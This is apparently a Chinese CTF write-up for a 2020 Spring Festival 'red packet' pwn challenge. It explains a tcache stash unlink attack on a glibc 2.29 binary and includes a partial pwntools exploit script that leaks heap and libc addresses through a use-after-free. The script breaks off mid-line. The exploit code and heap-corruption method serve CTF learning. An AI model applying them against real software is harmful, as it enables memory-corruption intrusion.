目录
[2020 新春红包题]3(Tcache stash unlink attack)
没有开canary,莫非有栈溢出?
同样把execve禁用了
删除的时候有指针悬挂
添加的时候限制了只能添加0x10,0xf0,0x300,0x400大小的
并且使用calloc分配,这意味着add时不会从tcache中取chunk
添加次数为0x1c(28),编辑次数为1
程序存在后门,刚好可以覆盖返回地址
利用思路如下
- 添加释放7次,把大小为0x410的chunk的tcache填满,并且利用show泄露heap_base
- 把大小为0x100的chunk放入tcache中6个
- 添加0x410大小的chunk并且释放来获得libc地址
- 把大小为0x100的chunk放入tcache中2个
- 利用UAF修改smallbin2(后进入smallbin的chunk)的bk为
qword_4058 + 0x800-0x10
- 申请0x100大小的chunk,这样
qword_4058 + 0x800-0x10
就会写上一个大数 - 再申请一个0x410的chunk,写入ROPchain
- 利用后门+栈迁移获得flag
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28846)
#r = process("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
where
''')
elf = ELF("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")
libc = ELF('./libc/libc-2.29.so')
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
menu = "Your input: "
def add(index, choice, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("Please input the red packet idx: ")
r.sendline(str(index))
r.recvuntil("How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ")
r.sendline(str(choice))
r.recvuntil("Please input content: ")
r.send(content)
def delete(index):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Please input the red packet idx: ")
r.sendline(str(index))
def edit(index, content):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Please input the red packet idx: ")
r.sendline(str(index))
r.recvuntil("Please input content: ")
r.send(content)
def show(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Please input the red packet idx: ")
r.sendline(str(index))
# fill full tcache size 0x410
for i in range(7):
add(0,4,'Chunk0')
delete(0)
# fill 6 in tcache size 0x100
for i in range(6):
add(1,2,'Chunk1')
delete(1)
show(0)
last_chunk_addr = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_addr = last_chunk_addr - 0x26C0
success("heap_base:"+hex(heap_addr))
add(2,4,'Chunk2')
add(3,3,'Chunk3')
delete(2)
show(2)
malloc_hook = u64(r.recvuntil('\n').strip().ljust(8, '\x00')) - 0x60 - 0x10
libc